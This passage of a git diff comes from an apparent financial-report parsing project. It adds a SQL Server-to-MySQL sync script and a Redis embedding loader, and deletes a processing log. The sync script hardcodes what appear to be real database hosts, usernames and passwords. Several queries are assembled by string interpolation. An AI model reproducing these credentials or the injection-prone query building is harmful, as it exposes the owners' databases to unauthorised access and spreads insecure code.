                if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords):
                    vector_obj = utils.embed_with_str(measure_name_1)
                    vector = vector_obj.output["embeddings"][0]["embedding"]
@ -822,7 +882,6 @@ def delete_database(file_id):
                      "delete from measure_list where file_id = %s;",
                     "delete from  word_parse_process where file_id = %s;",
                     "delete from  table_unit_info where file_id = %s;",
                    "delete from  word_measure_parse_process where file_id = %s;",
                    # "delete from a where file_id = %s;",
                    # "delete from b where file_id = %s;",
                ]
--- a/zzb_data_word/db_update.py
+++ b/zzb_data_word/db_update.py
@ -0,0 +1,201 @@
 import pymssql
 import mysql.connector
 import logging
 # 配置日志
 logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
 # SQL Server配置
 sql_server_config = {
    "server": "203.192.15.17",
    "port": 28063,
    "user": "zncbuser",
    "password": "ZZB-Cbindex-data",
    "database": "jydb",
 }
 # MySQL配置
 mysql_config = {
    "host": "rm-bp1f85h3xs6mvnf5e3o.mysql.rds.aliyuncs.com",
    "user": "zzb_jydb",
    "password": "Ysdbsdjs89Yrqwp",
    "database": "zzb_jydb",
 }
 def sync_table(table_name):
    try:
        # 连接到SQL Server
        sql_server_conn = pymssql.connect(**sql_server_config)
        sql_server_cursor = sql_server_conn.cursor()
        # 连接到MySQL
        mysql_conn = mysql.connector.connect(**mysql_config)
        mysql_cursor = mysql_conn.cursor()
        logging.info(f"Processing table: {table_name}")
        # 检查MySQL中是否已存在该表
        mysql_cursor.execute(f"SHOW TABLES LIKE '{table_name}'")
        table_exists = mysql_cursor.fetchone()
        # 获取表的列信息
        sql_server_cursor.execute(f"""
            SELECT 
                COLUMN_NAME, 
                DATA_TYPE, 
                CHARACTER_MAXIMUM_LENGTH, 
                NUMERIC_PRECISION, 
                NUMERIC_SCALE
            FROM INFORMATION_SCHEMA.COLUMNS
            WHERE TABLE_NAME = '{table_name}'
        """)
        columns = sql_server_cursor.fetchall()
        # 检查是否存在 XGRQ 或 UpdateTime 字段
        update_time_fields = ['xgrq', 'updatetime']  # 可能的字段名
        update_time_field = None
        for col in columns:
            if col[0].lower() in update_time_fields:
                update_time_field = col[0]  # 找到第一个匹配的字段
                break
        logging.info(f"Table {table_name} has update time field: {update_time_field}")
        if not table_exists:
            # 如果表不存在，创建表
            create_table_sql = f"CREATE TABLE {table_name} ("
            for col in columns:
                col_name = col[0]
                col_type = col[1]
                # 类型映射逻辑（略）
                create_table_sql += f"`{col_name}` {col_type}, "
            create_table_sql = create_table_sql.rstrip(", ") + ")"
            logging.info(f"Create table SQL: {create_table_sql}")
            # 在MySQL中创建表
            mysql_cursor.execute(create_table_sql)
            logging.info(f"Table {table_name} created in MySQL.")
        else:
            logging.info(f"Table {table_name} already exists in MySQL. Updating data...")
        # 获取SQL Server中的所有id
        sql_server_cursor.execute(f"SELECT {columns[0][0]} FROM {table_name}")
        sql_server_ids = {row[0] for row in sql_server_cursor.fetchall()}
        # 获取MySQL中的所有id
        mysql_cursor.execute(f"SELECT {columns[0][0]} FROM {table_name}")
        mysql_ids = {row[0] for row in mysql_cursor.fetchall()}
        # 找出需要插入的id
        ids_to_insert = sql_server_ids - mysql_ids
        logging.info(f"Found {len(ids_to_insert)} new rows to insert.")
        # 分批插入数据
        batch_size = 10000  # 每批次处理的行数
        id_list = list(ids_to_insert)
        for i in range(0, len(id_list), batch_size):
            batch_ids = id_list[i:i + batch_size]
            # 从SQL Server中查询需要插入的数据
            sql_server_cursor.execute(f"""
                SELECT * FROM {table_name}
                WHERE {columns[0][0]} IN ({', '.join(map(str, batch_ids))})
            """)
            rows_to_insert = sql_server_cursor.fetchall()
            # 插入数据到MySQL
            if rows_to_insert:
                insert_sql = f"INSERT INTO {table_name} ({', '.join([f'`{col[0]}`' for col in columns])}) VALUES ({', '.join(['%s'] * len(columns))})"
                mysql_cursor.executemany(insert_sql, rows_to_insert)
                mysql_conn.commit()
                logging.info(f"Inserted {len(rows_to_insert)} rows into {table_name}.")
        # 如果存在更新字段（XGRQ 或 UpdateTime），检查是否需要更新
        if update_time_field:
            logging.info(f"Checking for updates based on {update_time_field} field in table: {table_name}")
            # 获取SQL Server中的id和更新字段的值，且更新字段大于2023年
            sql_server_cursor.execute(f"""
                SELECT {columns[0][0]}, {update_time_field} FROM {table_name}
                WHERE {update_time_field} > '2023-11-12 20:23:23'
            """)
            sql_server_update_data = {row[0]: row[1] for row in sql_server_cursor.fetchall()}
            # 获取MySQL中的id和更新字段的值
            mysql_cursor.execute(f"""
                SELECT {columns[0][0]}, {update_time_field} FROM {table_name}
            """)
            mysql_update_data = {row[0]: row[1] for row in mysql_cursor.fetchall()}
            # 找出需要更新的id
            ids_to_update = []
            for id, sql_server_update_time in sql_server_update_data.items():
                if id in mysql_update_data and sql_server_update_time != mysql_update_data[id]:
                    ids_to_update.append(id)
            logging.info(f"Found {len(ids_to_update)} rows to update.")
            # 分批更新数据
            for i in range(0, len(ids_to_update), batch_size):
                batch_ids = ids_to_update[i:i + batch_size]
                # 从SQL Server中查询需要更新的数据，且更新字段大于2023年
                sql_server_cursor.execute(f"""
                    SELECT * FROM {table_name}
                    WHERE {columns[0][0]} IN ({', '.join(map(str, batch_ids))})
                      AND {update_time_field} > '2023-11-12 20:23:23'
                """)
                rows_to_update = sql_server_cursor.fetchall()
                # 更新数据到MySQL
                if rows_to_update:
                    update_sql = f"UPDATE {table_name} SET "
                    update_sql += ", ".join([f"`{col[0]}` = %s" for col in columns[1:]])  # 跳过id列
                    update_sql += f" WHERE `{columns[0][0]}` = %s"
                    update_values = [list(row[1:]) + [row[0]] for row in rows_to_update]  # 跳过id列
                    mysql_cursor.executemany(update_sql, update_values)
                    mysql_conn.commit()
                    logging.info(f"Updated {len(rows_to_update)} rows in table {table_name}.")
        logging.info(f"Sync completed for table: {table_name}")
    except Exception as e:
        logging.error(f"Failed to sync table {table_name}. Error: {e}")
    finally:
        # 关闭连接
        if 'sql_server_cursor' in locals():
            sql_server_cursor.close()
        if 'sql_server_conn' in locals():
            sql_server_conn.close()
        if 'mysql_cursor' in locals():
            mysql_cursor.close()
        if 'mysql_conn' in locals():
            mysql_conn.close()
 def main():
    try:
        # 连接到SQL Server
        sql_server_conn = pymssql.connect(**sql_server_config)
        sql_server_cursor = sql_server_conn.cursor()
        # 获取SQL Server中的所有表
        sql_server_cursor.execute("SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' ORDER BY TABLE_NAME")
        tables = sql_server_cursor.fetchall()
        # 处理每个表
        for table in tables:
            if table[0].lower() == "lc_mainshlistnew":
                sync_table(table[0])
        logging.info("All tables synced successfully!")
    except Exception as e:
        logging.error(f"Main function failed. Error: {e}")
    finally:
        # 关闭连接
        if 'sql_server_cursor' in locals():
            sql_server_cursor.close()
        if 'sql_server_conn' in locals():
            sql_server_conn.close()
 # 启动主函数
 if __name__ == "__main__":
    main()
--- a/zzb_data_word/file/docx/101.docx
+++ b/zzb_data_word/file/docx/101.docx
--- a/zzb_data_word/file/docx/test1.txt
+++ b/zzb_data_word/file/docx/test1.txt
--- a/zzb_data_word/insert_redis.py
+++ b/zzb_data_word/insert_redis.py
@ -0,0 +1,294 @@
 import pandas as pd
 import mysql.connector
 import utils
 #from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
 import re
 import redis
 def process_excel_and_db(input_excel_path1, input_excel_path2, output_file_path):
    # 读取第一个 Excel 文件
    df = pd.read_excel(input_excel_path1, sheet_name='Sheet2', header=0)#对应ttt表
    # 将 DataFrame 转换为字典列表
    data_list = df.to_dict(orient='records')
    # 连接到 MySQL 数据库
    conn = mysql.connector.connect(
        host=MYSQL_HOST,
        user=MYSQL_USER,
        password=MYSQL_PASSWORD,
        database=MYSQL_DB
    )
    cursor = conn.cursor()
    # 插入数据到 measure_create_config 表
    insert_query = '''
        INSERT INTO measure_create_config
        (config_id, meta_measure, same_mean_measure, measure_period, change_type, black_list) 
        VALUES (%s, %s, %s, %s, %s, %s)
    '''
    for data in data_list:
        show_measure = str(data['指标'])
        same_mean_measure = str(data['同义表述'])
        period_measure = str(data['周期'])
        change_measure = str(data['变动'])
        black_list = str(data['黑名单词'])
        config_id = utils.get_md5(show_measure)
        insert_query_data = (config_id, show_measure, same_mean_measure, period_measure, change_measure, black_list)
        cursor.execute(insert_query, insert_query_data)
        conn.commit()
    # 读取第二个 Excel 文件
    df_period = pd.read_excel(input_excel_path2, sheet_name='Sheet2', header=0)#对应周期表
    # 将 DataFrame 转换为字典列表
    period_list = df_period.to_dict(orient='records')
    # 插入数据到 measure_create_period 表
    period_insert_query = '''
        INSERT INTO measure_create_period
        (period_name, same_mean_period) 
        VALUES (%s, %s)
    '''
    for data in period_list:
        period_name = str(data['标准表述'])
        same_mean_period = str(data['同义表述'])
        insert_query_data = (period_name, same_mean_period)
        cursor.execute(period_insert_query, insert_query_data)
        conn.commit()
    # 查询数据库
    data_query = '''
        SELECT * FROM measure_create_config WHERE delete_status = 0
    '''
    period_query = '''
        SELECT * FROM measure_create_period
    '''
    cursor.execute(data_query)
    data_list = cursor.fetchall()
    cursor.execute(period_query)
    period_list = cursor.fetchall()
    # 输出到文件
    with open(output_file_path, 'w', encoding='utf-8') as file:
        for data in data_list:
            config_id = data[0]
            show_measure = data[1]
            same_mean_measure = data[2]
            period_measure = data[3]
            change_measure = data[4]
            same_mean_measure_arr = []
            period_measure_arr = []
            change_measure_arr = []
            if same_mean_measure != 'nan':
                same_mean_measure_arr = same_mean_measure.split(',')
                same_mean_measure_arr.append(show_measure)
            if period_measure != 'nan':
                period_measure_arr = period_measure.split(',')
            if change_measure != 'nan':
                change_measure_arr = change_measure.split(',')
            for c in change_measure_arr:
                period_measure_arr.append(c)
            for x in period_measure_arr:
                if x in change_measure_arr:
                    show_name = show_measure + x
                else:
                    show_name = x + show_measure
                for y in same_mean_measure_arr:
                    if x in change_measure:
                        parser_name = y + x
                    else:
                        parser_name = x + y
                    file.write(f'{show_name},{parser_name}\n')
                    for p in period_list:
                        period_exra_name = p[0]
                        period_exra_value = p[1]
                        if period_exra_name in x:
                            for v in period_exra_value.split(','):
                                if x in change_measure:
                                    parser_name = y + x.replace(period_exra_name, v)
                                else:
                                    parser_name = x.replace(period_exra_name, v) + y
                                file.write(f'{show_name},{parser_name}\n')
    cursor.close()
    conn.close()
 # 根据老指标配置表生成新指标配置表
 def create_new_config(conn, cursor, table_name,old_year,new_year):
    select_query = f'''
                SELECT measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance,year
                FROM {table_name}
                WHERE year = '{old_year}'
                '''
    cursor.execute(select_query)
    data_list = cursor.fetchall()
    insert_query = f'''
                INSERT INTO measure_config 
                (measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance, year) 
                VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
                '''
    for data in data_list:
        ori_measure_name = data[3]
        if re.match(r'^\d{4}',ori_measure_name):
            year = int(re.match(r'^\d{4}',ori_measure_name).group(0))
            year += 1
            ori_measure_name = str(year) + ori_measure_name[4:]
        insert_data = (data[0],data[1],data[2],ori_measure_name,data[4],data[5],data[6],new_year)
        cursor.execute(insert_query, insert_data)
    conn.commit()
    cursor.close()
    conn.close()
 def measure_config_to_db(conn, cursor, table_name):
    year_list = ["2021","2022","2023","2024","2025"]
    for year in year_list:
        insert_query = f'''
                    INSERT INTO {table_name}
                    (measure_id, measure_name, ori_measure_id, ori_measure_name,delete_status,distance,year) 
                    VALUES (%s, %s, %s, %s,%s,%s,%s)
                    '''
        check_query = f'''
                    SELECT ori_measure_id FROM {table_name} 
                    WHERE year = '{year}'
                    '''
        # 新增指标
        lines = [
                f"归母净利润同比变动,本报告期比上年同期增减归属于上市公司股东的净利润",
                f"扣非净利润同比变动,本报告期比上年同期增减归属于上市公司股东的扣除非经常性损益的净利润",
                # f"当期营业成本,本期发生额营业成本",
                # f"当期销售费用,本期发生额销售费用",
                # f"当期管理费用,本期发生额管理费用",
                # f"当期财务费用,本期发生额财务费用",
                # f"当期研发费用,本期发生额研发费用",
                # f"报告期末应收账款,本期发生额应收账款",
                # f"当期营业收入,本期发生额营业收入",
                # f"当期营业成本,{year}年第一季度营业成本",
                # f"当期销售费用,{year}年第一季度销售费用",
                # f"当期管理费用,{year}年第一季度管理费用",
                # f"当期财务费用,{year}年第一季度财务费用",
                # f"当期研发费用,{year}年第一季度研发费用",
                # f"报告期末应收账款,{year}年3月31日应收账款",
                # f"当期营业收入,{year}年第一季度营业收入",
                # f"报告期末总资产,{year}年3月31日资产",
                # f"报告期末总资产,{year}年3月31日资产总计",
                # f"报告期末货币资金,{year}年3月31日货币资金",
                # f"报告期末货币资金,{year}年3月31日货币资金合计",
                # f"报告期末存货,{year}年3月31日存货",
                # f"报告期末存货,{year}年3月31日存货合计",
                # f"报告期末固定资产,{year}年3月31日固定资产",
                # f"报告期末固定资产,{year}年3月31日固定资产合计",
                # f"报告期末在建工程,{year}年3月31日在建工程",
                # f"报告期末在建工程,{year}年3月31日在建工程合计",
                # f"报告期末商誉,{year}年3月31日商誉",
                # f"报告期末商誉,{year}年3月31日商誉合计",
                # f"报告期末短期借款,{year}年3月31日短期借款",
                # f"报告期末短期借款,{year}年3月31日短期借款合计",
                # f"报告期末应付账款,{year}年3月31日应付账款",
                # f"报告期末应付账款,{year}年3月31日应付账款合计",
                # f"报告期末合同负债,{year}年3月31日合同负债",
                # f"报告期末合同负债,{year}年3月31日合同负债合计",
                # f"报告期末长期借款,{year}年3月31日长期借款",
                # f"报告期末长期借款,{year}年3月31日长期借款合计",
                # f"上年年末总资产,{int(year)-1}年12月31日资产",
                # f"上年年末总资产,{int(year)-1}年12月31日资产总计",
                # f"上年年末货币资金,{int(year)-1}年12月31日货币资金",
                # f"上年年末货币资金,{int(year)-1}年12月31日货币资金合计",
                # f"上年年末存货,{int(year)-1}年12月31日存货",
                # f"上年年末存货,{int(year)-1}年12月31日存货合计",
                # f"上年年末固定资产,{int(year)-1}年12月31日固定资产",
                # f"上年年末固定资产,{int(year)-1}年12月31日固定资产合计",
                # f"上年年末在建工程,{int(year)-1}年12月31日在建工程",
                # f"上年年末在建工程,{int(year)-1}年12月31日在建工程合计",
                # f"上年年末商誉,{int(year)-1}年12月31日商誉",
                # f"上年年末商誉,{int(year)-1}年12月31日商誉合计",
                # f"上年年末短期借款,{int(year)-1}年12月31日短期借款",
                # f"上年年末短期借款,{int(year)-1}年12月31日短期借款合计",
                # f"上年年末合同负债,{int(year)-1}年12月31日合同负债",
                # f"上年年末合同负债,{int(year)-1}年12月31日合同负债合计",
                # f"上年年末长期借款,{int(year)-1}年12月31日长期借款",
                # f"上年年末长期借款,{int(year)-1}年12月31日长期借款合计",
                ]
        # 打印每一行
        for line in lines:
            config_list = line.strip().split(',')
            measure = config_list[0]
            ori_measure = config_list[1]
            ori_measure_id = utils.get_md5(ori_measure)
            # 判断数据库中是否有数据
            cursor.execute(check_query)
            check_records = cursor.fetchall()
            if any(record[0] == ori_measure_id for record in check_records):
                continue
            data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure,0,0.94,year)
            cursor.execute(insert_query, data_to_insert)
            conn.commit()
 def insert_measure_vector(conn,cursor,table_name):
    from config import REDIS_HOST,REDIS_PASSWORD,REDIS_PORT
    redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)# 192.168.0.172 #测试123.60.153.169
    # 执行SQL语句，更新数据
    select_query = f'''
                SELECT ori_measure_id,ori_measure_name FROM {table_name}
                '''
    cursor.execute(select_query)
    records = cursor.fetchall()
    print(f"总计{len(records)}条数据")
    for record in records:
        if redis_client.hexists('measure_config', record[0]):
            measure_vector = redis_client.hget('measure_config', record[0])
        else:
            print('新增指标',record[1])
            vector_obj = utils.embed_with_str(record[1])
            measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
        redis_client.hset('measure_config', record[0], measure_vector)
    redis_client.close()
    conn.close()
 #from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
 if __name__ == "__main__":
    #需要先清空本地数据库的  measure_create_config 和   measure_create_period   表
    # process_excel_and_db(
    #     'F:\\11_pdf\\ttt_1.xlsx',#ttt文件
    #     'F:\\11_pdf\\period_1.xlsx',#period文件
    #     'F:\\11_pdf\\out_2022_new_year.txt'#输出文件
    # )
    from config import MYSQL_HOST_APP, MYSQL_USER_APP, MYSQL_PASSWORD_APP, MYSQL_DB_APP
    conn = mysql.connector.connect(
        host=MYSQL_HOST_APP,
        user=MYSQL_USER_APP,
        password=MYSQL_PASSWORD_APP,
        database=MYSQL_DB_APP
    )
    cursor = conn.cursor()
    #file_path = r'F:\\11_pdf\\out_2022_new_year.txt'
    # 更新第一季度的measure_vector
    table_name = 'measure_config_first_quarter'
    # 写入mysql
    # measure_config_to_db(conn, cursor, table_name)
    create_new_config(conn, cursor, table_name,'2024','2025')
    # 插入redies
    insert_measure_vector(conn,cursor,table_name)
--- a/zzb_data_word/log-day/sec.log
+++ b/zzb_data_word/log-day/sec.log
@ -1,204 +0,0 @@
 2024-12-29 16:13:29,975|zzb_logger  : INFO     开始启动文件解析任务: 1.docx
 2024-12-29 16:13:36,106|zzb_logger  : INFO     任务 201917 完成
 2024-12-29 16:15:16,205|zzb_logger  : INFO     开始启动文件解析任务: 1.docx
 2024-12-29 16:15:22,356|zzb_logger  : INFO     任务 201917 完成
 2024-12-29 16:17:15,693|zzb_logger  : INFO     开始启动文件解析任务: 1.docx
 2024-12-29 16:17:15,696|zzb_logger  : INFO     通知pdf开始解析url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=5
 2024-12-29 16:17:15,696|zzb_logger  : INFO     通知pdf开始解析状态:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
        "http://www.w3.org/TR/html4/strict.dtd">
 <html>
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
        <title>Error response</title>
    </head>
    <body>
        <h1>Error response</h1>
        <p>Error code: 404</p>
        <p>Message: File not found.</p>
        <p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
    </body>
 </html>
 2024-12-29 16:17:25,319|zzb_logger  : INFO     text，任务ID:201917
 2024-12-29 16:17:26,701|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (5116)...
 2024-12-29 16:17:28,173|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (22268)...
 2024-12-29 16:17:29,591|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (27736)...
 2024-12-29 16:17:30,937|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (38276)...
 2024-12-29 16:17:32,294|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (38292)...
 2024-12-29 16:17:33,664|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (38240)...
 2024-12-29 16:17:35,153|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (28536)...
 2024-12-29 16:17:36,559|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (37552)...
 2024-12-29 16:17:37,929|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (37856)...
 2024-12-29 16:17:39,291|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (10528)...
 2024-12-29 16:17:40,688|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (31444)...
 2024-12-29 16:17:42,133|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (11108)...
 2024-12-29 16:17:43,518|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (23236)...
 2024-12-29 16:17:44,901|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (23572)...
 2024-12-29 16:17:46,495|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (39604)...
 2024-12-29 16:17:47,899|zzb_logger  : INFO     Run task 处理word文件中的 text file_id:201917 (4076)...
 2024-12-29 16:17:47,899|zzb_logger  : INFO     等待所有子任务完成，任务ID:201917
 2024-12-29 16:18:02,194|zzb_logger  : INFO     word表格中 text解析完成，任务ID:201917
 2024-12-29 16:18:02,196|zzb_logger  : INFO     开始解析word表表格中的table，任务ID:201917
 2024-12-29 16:18:03,525|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (36176)...
 2024-12-29 16:18:04,585|zzb_logger  : INFO     Task 解析表格201917 runs 1.06 seconds.
 2024-12-29 16:18:04,873|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (35368)...
 2024-12-29 16:18:05,769|zzb_logger  : INFO     Task 解析表格201917 runs 0.90 seconds.
 2024-12-29 16:18:06,263|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (33004)...
 2024-12-29 16:18:07,225|zzb_logger  : INFO     Task 解析表格201917 runs 0.96 seconds.
 2024-12-29 16:18:07,628|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (30764)...
 2024-12-29 16:18:08,427|zzb_logger  : INFO     Task 解析表格201917 runs 0.80 seconds.
 2024-12-29 16:18:08,976|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (29608)...
 2024-12-29 16:18:09,864|zzb_logger  : INFO     Task 解析表格201917 runs 0.89 seconds.
 2024-12-29 16:18:10,588|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (5404)...
 2024-12-29 16:18:11,360|zzb_logger  : INFO     Task 解析表格201917 runs 0.77 seconds.
 2024-12-29 16:18:11,966|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (36200)...
 2024-12-29 16:18:12,030|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (36328)...
 2024-12-29 16:18:12,892|zzb_logger  : INFO     Task 解析表格201917 runs 0.93 seconds.
 2024-12-29 16:18:13,034|zzb_logger  : INFO     Task 解析表格201917 runs 1.00 seconds.
 2024-12-29 16:18:13,392|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (39712)...
 2024-12-29 16:18:14,166|zzb_logger  : INFO     Task 解析表格201917 runs 0.77 seconds.
 2024-12-29 16:18:15,030|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (17184)...
 2024-12-29 16:18:15,084|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (38828)...
 2024-12-29 16:18:15,156|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (39596)...
 2024-12-29 16:18:15,194|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (36908)...
 2024-12-29 16:18:15,268|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (38088)...
 2024-12-29 16:18:15,273|zzb_logger  : INFO     解析表格时出现了异常 setting an array element with a sequence. The requested array has an inhomogeneous shape after 1 dimensions. The detected shape was (8,) + inhomogeneous part. 内容为{'type': 'table', 'index': 1438, 'data': [['项目', '期末', '期末', '期末', '期末', '期末', '期初', '期初', '期初', '期初', '期初', '期初', '期初', '期初'], ['', '账面余额', '账面价值', '受限类型', '受限情况', '受限情况', '账面余额', '账面余额', '账面价值', '账面价值', '受限类型', '受限类型', '受限情况', ''], ['货币资金', '485,532.72', '485,532.72', '', '住房专用基金', '住房专用基金', '482,151.75', '482,151.75', '482,151.75', '482,151.75', '', '', '住房专用基金', ''], ['固定资产', '9,798,299.46', '9,798,299.46', '', '金融机构借款抵押', '3,747,470.09', '3,747,470.09', '3,747,470.09', '3,747,470.09', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['无形资产', '7,982,261.87', '7,982,261.87', '', '金融机构借款抵押', '5,437,462.92', '5,437,462.92', '5,437,462.92', '5,437,462.92', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['货币资金', '43,997,452.57', '43,997,452.57', '', '银行保证金', '63,388,483.00', '63,388,483.00', '63,388,483.00', '63,388,483.00', '', '', '银行保证金', '银行保证金'], ['投资性房地产', '62,041,831.52', '62,041,831.52', '', '金融机构借款抵押', '67,653,392.10', '67,653,392.10', '67,653,392.10', '67,653,392.10', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['合计', '124,305,378.14', '124,305,378.14', '', '', '140,708,959.86', '140,708,959.86', '140,708,959.86', '140,708,959.86', '', '', '', '']]}
 2024-12-29 16:18:15,722|zzb_logger  : INFO     Task 解析表格201917 runs 0.69 seconds.
 2024-12-29 16:18:15,873|zzb_logger  : INFO     Task 解析表格201917 runs 0.79 seconds.
 2024-12-29 16:18:16,067|zzb_logger  : INFO     Task 解析表格201917 runs 0.91 seconds.
 2024-12-29 16:18:16,086|zzb_logger  : INFO     Task 解析表格201917 runs 0.89 seconds.
 2024-12-29 16:18:16,158|zzb_logger  : INFO     Task 解析表格201917 runs 0.89 seconds.
 2024-12-29 16:18:16,787|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (39052)...
 2024-12-29 16:18:16,847|zzb_logger  : INFO     Run task 处理word文件中的table file_id:201917 (35928)...
 2024-12-29 16:18:17,456|zzb_logger  : INFO     Task 解析表格201917 runs 0.61 seconds.
 2024-12-29 16:18:17,644|zzb_logger  : INFO     Task 解析表格201917 runs 0.86 seconds.
 2024-12-29 16:18:17,819|zzb_logger  : INFO     word表格中 table解析完成，任务ID:201917
 2024-12-29 16:18:17,985|zzb_logger  : INFO     解析任务 201917 完成，耗时62.29 秒。
 2024-12-29 16:18:18,106|zzb_logger  : INFO     通知开始抽取指标url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=6
 2024-12-29 16:18:18,106|zzb_logger  : INFO     通知开始抽取指标状态:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
        "http://www.w3.org/TR/html4/strict.dtd">
 <html>
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
        <title>Error response</title>
    </head>
    <body>
        <h1>Error response</h1>
        <p>Error code: 404</p>
        <p>Message: File not found.</p>
        <p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
    </body>
 </html>
 2024-12-29 16:18:18,107|zzb_logger  : INFO     开始表格指标抽取，任务ID:201917
 2024-12-29 16:18:20,187|zzb_logger  : INFO     提取指标任务 0-10 (29656)...
 2024-12-29 16:18:21,575|zzb_logger  : INFO     提取指标任务 10-20 (38952)...
 2024-12-29 16:18:22,849|zzb_logger  : INFO     提取指标任务 20-30 (31900)...
 2024-12-29 16:18:24,192|zzb_logger  : INFO     提取指标任务 30-40 (30420)...
 2024-12-29 16:18:25,554|zzb_logger  : INFO     提取指标任务 40-50 (32448)...
 2024-12-29 16:18:26,909|zzb_logger  : INFO     提取指标任务 50-60 (37708)...
 2024-12-29 16:18:28,305|zzb_logger  : INFO     提取指标任务 60-70 (36136)...
 2024-12-29 16:18:28,933|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,933|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,933|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,934|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,934|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,934|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,934|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,934|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,934|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,934|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,935|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,935|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,935|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,935|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,935|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,935|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,936|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,941|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,941|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,941|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,941|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,941|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,942|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
